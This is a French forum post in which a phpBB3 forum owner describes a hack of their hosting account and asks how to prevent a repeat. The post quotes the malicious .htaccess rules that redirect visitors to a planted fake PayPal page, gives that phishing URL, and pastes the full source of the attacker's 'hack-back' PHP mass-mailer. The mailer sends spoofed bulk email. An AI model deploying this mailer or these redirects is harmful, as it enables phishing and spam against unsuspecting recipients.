Bonsoir,
voila j'expose un probléme que je viens de rencontrer aujourd'huit :
en faite, ce matin, j'ai la surprise de trouver mon forum (phpbb3) non fonctionnel avec un message d'erreur de la base de donnee.
je tente de me connecter sur mon cpanel -> le password est réfusé
je contacte mon serveur qui m'envoi un nouveau password.
et quand je me connect à nouveau sur mon serveur surprise ! je trouve un nouveau dossier nommé (paypal) et un fichier nommé (mailer.php) et aussi je trouve mon .htaccess modifier :
RewriteEngine on RewriteCond %{HTTP_HOST} !^www\.discussion-diagnostique\.com [NC] RewriteRule (.*) [url="http://www.discussion-diagnostique.com/$1"]http://www.discussion-diagnostique.com/$1[/url] [QSA,R=301,L] ErrorDocument 404 /RewriteCond %{HTTP_HOST} ^.*$ RewriteRule ^confirm-paypal/?$ [url="http://www.discussion-diagnostique.com/confirm-paypal/index.htm"]http://www.discussion-diagnostique.com/con...aypal/index.htm[/url] [R=302,L] RewriteCond %{HTTP_HOST} ^.*$ RewriteRule ^confirm-paypal/?$ [url="http://discussion-diagnostique.com/paypal/index.htm"]http://discussion-diagnostique.com/paypal/index.htm[/url] [R=302,L] RewriteCond %{HTTP_HOST} ^.*$ RewriteRule ^confirm-paypal/index.htm$ [url="http://discussion-diagnostique.com/paypal/index.htm"]http://discussion-diagnostique.com/paypal/index.htm[/url] [R=302,L]
voici ce qu'il y'a dans le mailer.php :
<?php if(isset($_POST['action'] ) ){ $action=$_POST['action']; $message=$_POST['message']; $emaillist=$_POST['emaillist']; $from=$_POST['from']; $replyto=$_POST['replyto']; $subject=$_POST['subject']; $realname=$_POST['realname']; $file_name=$_POST['file']; $contenttype=$_POST['contenttype']; $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style> html{scrollbar-base-color:#000000;scrollbar-arrow-color: #878787; scrollbar-track-color:#A878787;}.ws36 {font-size: 48px;} .ws18 {font-size: 24px;} .ws26 {font-size: 35px;} --></style> <style type="text/css"> <!-- .style1 { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } --> </style> <style type="text/css"> <!-- .style1 { font-size: 10px; font-family: Geneva, Arial, Helvetica, sans-serif; } --> </style> </head> <body bgcolor="#000000" text="#00FF00"> <span class="style1">PHP eMailer<br> made by !! hack-back !! ( <a href="mailto:h-b_AT_w.cn"><font color="#FF0000">h-b_AT_w.cn</font></a><font color="#FF0000"> </font>) .</span> <form name="form1" method="post" action="" enctype="multipart/form-data"> <div style="background-color: #00FF00"> <p align="center"><b><font color="#FF0000" face="Comic Sans MS">!! Hack-Back !! PHP Mailer Script</font></b><br> </div> <table width="100%" border="0"> <tr> <td width="10%" height="24"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> Your Email:</font></div> </td> <td width="18%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="from" value="<? print $from; ?>" size="30" style="background-color: #FF0000"> </font></td> <td width="31%" height="24"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> Your Name:</font></div> </td> <td width="41%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="realname" value="<? print $realname; ?>" size="30" style="background-color: #FF0000"> </font></td> </tr> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> Reply-To:</font></div> </td> <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="replyto" value="<? print $replyto; ?>" size="30" style="background-color: #FF0000"> </font></td> <td width="31%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> Attach File:</font></div> </td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="file" name="file" size="30" style="background-color: #FF0000"> </font></td> </tr> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> Subject:</font></div> </td> <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input name="subject" value="<? print $subject; ?>" size="90" style="background-color: #FF0000"> </font></td> </tr> <tr valign="top"> <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="message" cols="60" rows="10" style="background-color: #FF0000"><? print $message; ?></textarea> <br> <input type="radio" name="contenttype" value="plain"> Plain <input name="contenttype" type="radio" value="html" checked> HTML <input type="hidden" name="action" value="send"> <input type="submit" value="Send eMails"> </font></td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="emaillist" cols="30" rows="10" style="background-color: #FF0000"><? print $emaillist; ?></textarea> </font></td> </tr> </table> </form> <? if ($action){ if (!$from && !$subject && !$message && !$emaillist){ print "Please complete all fields before sending your message."; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to......."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; mail($to, $subject, "", $header); print "ok<br>"; flush(); } } } ?> <p class="style1">PHP Mailer<br> © !! hack-back !! (<a href="mailto:%20h-b_AT_w.cn"><font color="#FF0000"> h-b_AT_w.cn </font> </a>) . <br> </p> <?php if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";} ?> <p> </p> </body> </html>
j'ai supprimé le .htaccess et le mailer.php. par contre j'ai laissé le dossier paypal pour preuve auprés de mon serveur. d'ailleurs si vous voulais voir de quoi il s'agit avant que je supprime le dossier :
http://www.discussion-diagnostique.com/paypal/index.htm
svp conseillez moi ! comment faire pour ne plus avoir ce genre de surprise ! est ce que je doit tous supprimer (mes bases de donnees ...)
merci !